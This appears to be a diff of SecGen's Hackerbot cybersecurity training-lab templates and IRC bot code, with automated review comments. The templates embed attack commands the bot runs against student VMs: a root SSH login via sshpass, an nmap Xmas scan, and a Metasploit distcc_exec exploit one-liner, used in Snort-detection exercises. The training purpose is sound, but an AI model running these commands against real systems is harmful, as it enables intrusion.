diff --git a/modules/generators/structured_content/hackerbot_config/hacker_vs_hackerbot_1/templates/lab.xml.erb b/modules/generators/structured_content/hackerbot_config/hacker_vs_hackerbot_1/templates/lab.xml.erb
index ca5b8ef8a..023b6795b 100644
--- a/modules/generators/structured_content/hackerbot_config/hacker_vs_hackerbot_1/templates/lab.xml.erb
+++ b/modules/generators/structured_content/hackerbot_config/hacker_vs_hackerbot_1/templates/lab.xml.erb
@@ -62,8 +62,11 @@
sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@{{chat_ip_address}} /bin/bash
+
- Today you are about to be under attack.
+
+
+ You are about to be attacked!
When you are ready, simply say 'ready'.
@@ -114,14 +117,14 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
<%
- $permission_attacks = ['file_perms_attack_1.xml.erb', 'file_perms_attack_2.xml.erb', 'file_perms_attack_3.xml.erb', 'file_perms_attack_4.xml.erb']
+ $permission_attacks = ['file_perms_attack_1.xml.erb', 'file_perms_attack_2.xml.erb', 'file_perms_attack_3.xml.erb', 'file_perms_attack_4.xml.erb'].shuffle
%>
<%= ERB.new(File.read self.templates_path + $permission_attacks.pop ).result(self.get_binding) %>
<%= ERB.new(File.read self.templates_path + $permission_attacks.pop ).result(self.get_binding) %>
<%
- $integrity_attacks = ['integrity_attack1.xml.erb', 'integrity_attack2.xml.erb', 'integrity_attack3.xml.erb', 'integrity_attack4.xml.erb', 'integrity_attack5.xml.erb', 'integrity_attack6.xml.erb', 'integrity_attack7.xml.erb']
+ $integrity_attacks = ['integrity_attack1.xml.erb', 'integrity_attack2.xml.erb', 'integrity_attack3.xml.erb', 'integrity_attack4.xml.erb', 'integrity_attack5.xml.erb', 'integrity_attack6.xml.erb', 'integrity_attack7.xml.erb'].shuffle
%>
<%= ERB.new(File.read self.templates_path + $integrity_attacks.pop ).result(self.get_binding) %>
<%= ERB.new(File.read self.templates_path + $integrity_attacks.pop ).result(self.get_binding) %>
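Review bot: The `.shuffle` added to `$permission_attacks` and `$integrity_attacks` uses the default global RNG, so the two templates picked by the following `pop` calls differ on every render; if SecGen's scenario generation is meant to be reproducible from a seed (this hunk does not show whether it is), pass the scenario's random source explicitly, e.g. `].shuffle(random: Random.new(<scenario_seed>))`. Both arrays are `$` globals that are drained by `pop` on the next two lines, so any other template rendered in the same process that happens to use these names sees the already-popped arrays; if the included attack templates do not need them, a local variable in this template would avoid that. Minor style: `File.read self.templates_path + $permission_attacks.pop` reads more clearly with parentheses, `File.read(templates_path + $permission_attacks.pop)`.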
diff --git a/modules/generators/structured_content/hackerbot_config/ids/templates/lab.xml.erb b/modules/generators/structured_content/hackerbot_config/ids/templates/lab.xml.erb
index 38dd49229..91a64569d 100644
--- a/modules/generators/structured_content/hackerbot_config/ids/templates/lab.xml.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids/templates/lab.xml.erb
@@ -230,7 +230,7 @@ I'm about to attack your system, use Snort to detect the method of attack.
nmap -sX <%= $web_server_ip %> > /dev/null; echo $?
- false
+ false
#5 Your webserver is about to be scanned/attacked. Make sure you are using Snort to monitor your network...
@@ -255,11 +255,10 @@ I'm about to attack your system, use Snort to detect the method of attack.
- <%= ERB.new(File.read self.templates_path + 'snort.md.erb').result(self.get_binding) %>
- msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"
+ msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"
whoami > /dev/null; echo "<%= $flags.pop %>" > /dev/null; echo 'Find the flag! (in the network traffic)'
#6 Your webserver is about to be scanned/attacked. Use Tcpdump and/or Wireshark to view the behaviour of the attacker. There is a flag to be found over the wire.
diff --git a/modules/generators/structured_content/hackerbot_config/ids/templates/write_snort_rules.md.erb b/modules/generators/structured_content/hackerbot_config/ids/templates/write_snort_rules.md.erb
index f39624ce4..41ec52e98 100644
--- a/modules/generators/structured_content/hackerbot_config/ids/templates/write_snort_rules.md.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids/templates/write_snort_rules.md.erb
@@ -57,9 +57,11 @@ echo 'alert tcp any any -> any 80 (msg: "Web traffic detected - ASDFGH"; sid:10
service snort restart
```
+
+==**Don't forget to reload Snort every time you add or modify a rule!**==
+
**From your desktop VM**, browse to a website, and confirm the rule worked to generate an alert containing "ASDFGH". Note that Hackerbot will require you to include particular text within the alerts of the rules you write.
-==Don't forget to reload Snort every time you add or modify a rule!==
# TODO RANDOM
# HACKERBOT ATTACKS
diff --git a/modules/generators/structured_content/hackerbot_config/ids_rules/templates/lab.xml.erb b/modules/generators/structured_content/hackerbot_config/ids_rules/templates/lab.xml.erb
index 563598536..e03e682c6 100644
--- a/modules/generators/structured_content/hackerbot_config/ids_rules/templates/lab.xml.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids_rules/templates/lab.xml.erb
@@ -63,6 +63,8 @@
false
+
+
Your web server is going to be attacked. I have inside information that will help you to monitor your network for the attacks. If you work with me I'll provide you with some flags.
@@ -112,193 +114,23 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
true
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
- sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $web_server_ip %> /bin/bash
+ msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"
+ whoami > /dev/null; echo "<%= $flags.pop %>" > /dev/null; echo 'Find the flag! (in the network traffic)'
-
- It's your job to set up remote backups for <%= $second_user %> (a user on your system). Use rsync to create a full (epoch) remote backup of /home/<%= $second_user %> from your desktop system to the backup_server: <%= $web_server_ip %>:/home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>.
+ #6 Your webserver is about to be scanned/attacked. Use Tcpdump and/or Wireshark to view the behaviour of the attacker. There is a flag to be found over the wire.
- ls /home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>/<%= $files.sample %> > /dev/null; echo $?
0
- :) Well done! <%= $flags.pop %>
- true
+ Hope you caught that.
+
- No such file or directory
- :( You didn't copy to remote ssh /home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>/ Remember that the trailing / changes whether you are copying directories or their contents...
+ 1
+ :( Failed to contact the web server (<%= $web_server_ip %>)
- :( Doesn't look like you have backed up all of <%= $second_user %>'s files to /home/<%= $main_user %>/remote-rsync-backup/<%= $second_user %>. Try SSHing to the server and look at what you have backed up there.
+ :( Something was not right...
<%= ERB.new(File.read self.templates_path + 'write_snort_rules.md.erb').result(self.get_binding) %>
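Review bot: The `0` and `1` output conditions (the kept `0` line and the new `1` before `:( Failed to contact the web server`) were carried over from the removed rsync check, whose command ended with `echo $?`; the new command sequence `msfconsole -x "…distcc_exec…"` followed by `whoami > /dev/null; echo "<%= $flags.pop %>" > /dev/null; echo 'Find the flag! …'` never prints an exit status. Unless hackerbot matches these conditions as substrings of the msfconsole output (the XML element names were stripped in this diff, so I cannot confirm the matching rule), the `Hope you caught that.` and `Failed to contact` branches look unreachable and every run falls through to `:( Something was not right...`; either append `; echo $?` to the final shell line or remove the numeric conditions. Note also that `$flags.pop` is evaluated when the template is rendered, not when the attack runs, so the flag is consumed even if this attack is never reached — the ids lab carries the same lines, so this is presumably intended, but worth a comment.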
diff --git a/modules/generators/structured_content/hackerbot_config/ids_rules/templates/write_snort_rules.md.erb b/modules/generators/structured_content/hackerbot_config/ids_rules/templates/write_snort_rules.md.erb
index 88783f71c..b40035d51 100644
--- a/modules/generators/structured_content/hackerbot_config/ids_rules/templates/write_snort_rules.md.erb
+++ b/modules/generators/structured_content/hackerbot_config/ids_rules/templates/write_snort_rules.md.erb
@@ -53,9 +53,9 @@ Lets create a basic rule that detects any web traffic on port 80.
```bash
echo "alert tcp any any -> any 80 (msg: "Web traffic detected - RANDOM"; sid:1000002; rev:1;)" >> /etc/snort/rules/my.rules
-systemctl restart snort
+sudo service snort restart
```
-Browse to a website, and confirm the rule worked to generate an alert containing RANDOM.
+Browse to a website, and confirm the rule worked to generate an alert containing the text 'RANDOM'.
# TODO RANDOM
diff --git a/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb b/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb
index 5de097b9f..894562a70 100644
--- a/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb
+++ b/modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb
@@ -34,6 +34,9 @@ def check_output_conditions(bot_name, bots, current, lines, m)
sleep(1)
# prompt for current hack
+ if bots[bot_name]['messages'].key?('show_attack_numbers')
+ m.reply "** ##{current + 1} **"
+ end
m.reply bots[bot_name]['attacks'][current]['prompt']
else
m.reply bots[bot_name]['messages']['last_attack'].sample
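Review bot: `bots[bot_name]['messages'].key?('show_attack_numbers')` tests only that the key exists, so a bot config that sets the message to an empty or false-like value still turns the numbering on; if the value is meant to act as a switch, test the value, `if bots[bot_name]['messages']['show_attack_numbers']`, after confirming how the bot XML is parsed (it may arrive as a string). The same three-line block is pasted five times — here in check_output_conditions and in the four read_bots hunks at `@@ -130`, `@@ -148`, `@@ -169` and `@@ -218` — each time directly before the identical `m.reply bots[bot_name]['attacks'][current]['prompt']`, so one helper keeps the key name and message format in a single place. Both enclosing methods start and end outside these hunks.
```ruby
# Send the prompt for attack `current` (0-based), prefixed with its 1-based
# number when the bot config carries a 'show_attack_numbers' message.
def reply_attack_prompt(bot, current, m)
  m.reply "** ##{current + 1} **" if bot['messages'].key?('show_attack_numbers')
  m.reply bot['attacks'][current]['prompt']
end

# … unchanged: check_output_conditions up to the prompt for the current hack …
reply_attack_prompt(bots[bot_name], current, m)
```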
@@ -130,6 +133,9 @@ def read_bots (irc_server_ip_address)
current = bots[bot_name]['current_attack']
# prompt for the first attack
+ if bots[bot_name]['messages'].key?('show_attack_numbers')
+ m.reply "** ##{current + 1} **"
+ end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
end
@@ -148,6 +154,9 @@ def read_bots (irc_server_ip_address)
current = bots[bot_name]['current_attack']
# prompt for current hack
+ if bots[bot_name]['messages'].key?('show_attack_numbers')
+ m.reply "** ##{current + 1} **"
+ end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
else
@@ -169,6 +178,9 @@ def read_bots (irc_server_ip_address)
current = bots[bot_name]['current_attack']
# prompt for current hack
+ if bots[bot_name]['messages'].key?('show_attack_numbers')
+ m.reply "** ##{current + 1} **"
+ end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
else
@@ -218,6 +230,9 @@ def read_bots (irc_server_ip_address)
sleep(1)
# prompt for current hack
+ if bots[bot_name]['messages'].key?('show_attack_numbers')
+ m.reply "** ##{current + 1} **"
+ end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
else
@@ -369,9 +384,9 @@ def read_bots (irc_server_ip_address)
rescue # continue consuming until input blocks
end
begin
- Timeout.timeout(5) do # timeout 10 sec
+ Timeout.timeout(15) do # timeout 10 sec
stdin.close # no more input, end the program
- post_lines = stdout_err.read.chomp()
+ post_lines << stdout_err.read.chomp()
end
rescue Timeout::Error
Process.kill("KILL", wait_thr.pid)
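Review bot: The comment on `Timeout.timeout(15) do # timeout 10 sec` was already wrong for the old value of 5 and is now off by a further 5 seconds; either drop the number or name the value, `Timeout.timeout(POST_READ_TIMEOUT) do # give the command time to flush its remaining output`. Changing `post_lines = …` to `post_lines << …` turns the line from an assignment into an in-place append, so whatever the preceding `rescue # continue consuming until input blocks` loop presumably collected now survives — that looks intended, but it requires `post_lines` to be initialised as a mutable String outside this hunk; an empty-literal initialiser would raise FrozenError here if the file ever gains `# frozen_string_literal: true`. Tripling the timeout also triples how long a stuck attack command holds the bot before `Process.kill("KILL", wait_thr.pid)` runs, which deserves a one-line comment if attacks are handled serially. The enclosing method continues outside the hunk on both sides.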